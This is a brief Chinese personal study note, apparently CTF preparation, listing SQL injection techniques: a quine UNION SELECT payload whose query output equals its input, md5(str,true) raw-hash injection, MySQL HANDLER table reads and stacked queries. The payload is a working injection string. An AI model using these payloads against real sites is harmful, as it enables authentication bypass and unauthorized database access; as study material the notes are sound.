个人学习和生活点滴记录
February 20th, 2022
'UNION(SELECT(REPLACE(REPLACE('"UNION(SELECT(REPLACE(REPLACE("?",CHAR(34),CHAR(39)),CHAR(63),"?")))#',CHAR(34),CHAR(39)),CHAR(63),'"UNION(SELECT(REPLACE(REPLACE("?",CHAR(34),CHAR(39)),CHAR(63),"?")))#')))#
md5("str",true)注入
handler ... open;handler ... read first[next];
堆叠注入
SQL执行后等于自己